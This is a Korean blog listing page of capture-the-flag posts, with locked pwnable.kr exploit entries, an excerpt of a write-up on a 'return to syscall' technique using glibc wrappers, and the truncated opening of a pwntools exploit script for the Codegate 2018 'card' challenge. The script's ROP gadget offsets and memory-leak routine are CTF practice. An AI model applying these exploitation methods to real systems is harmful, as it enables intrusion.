분류 전체보기 (66) 썸네일형 리스트형 lfh 뇌피셜 보호되어 있는 글입니다. pwnable.kr starcraft write up 보호되어 있는 글입니다. pwnable.kr dos4fun exploit code 보호되어 있는 글입니다. pwnable.kr aeg exploit code 보호되어 있는 글입니다. pwnable.kr elf exploit code 보호되어 있는 글입니다. pwnable.kr lokihardt exploit code 보호되어 있는 글입니다. [문서] Return to syscall + H3X0R CTF libsteak write up Return to syscall H3X0R ctf libsteak write up 314ckC47 H3X0R Summary 이번에 H3X0R CTF에서 출제한 문제중 libsteak 문제의 intended solution인 "자칭" return to syscall이란 기법에 대해 작성 해 보겠습니다. 이 기법의 아이디어 캐치는 "코드게이트 예선 문제"였구요 이 아이디어를 이용해 libsteak를 풀 수 가 있습니다. Syscall Wrapping Functions 핵심적으로 알아야 할 것은, glibc(libc.so.6)에서는 system call을 wrapping 하는 함수가 '꽤나' 있단 겁니다. 당장 우리가 자주 쓰는 read 함수나, write 함수만 봐도, // path : /glibc-2.27.. Codegate 2018 'card' exploit code #!/usr/bin/python from pwn import * from struct import * p = process("./card") p = remote("110.10.147.17",8888) e = ELF("./card") l = ELF("/lib/i386-linux-gnu/libc.so.6") l = ELF("/lib32/libc.so.6") raw_input(">>>") pppr = 0x1439 leaveret = 0xd3c pebpret = 0x143b addr = 0 def leak(snum): addr = 0 for i in [1,0x100,0x10000,0x1000000]: p.readuntil("x, y : ") p.sendline("{},0".format(snum)) p.readu.. 이전 1 2 3 4 5 6 ··· 9 다음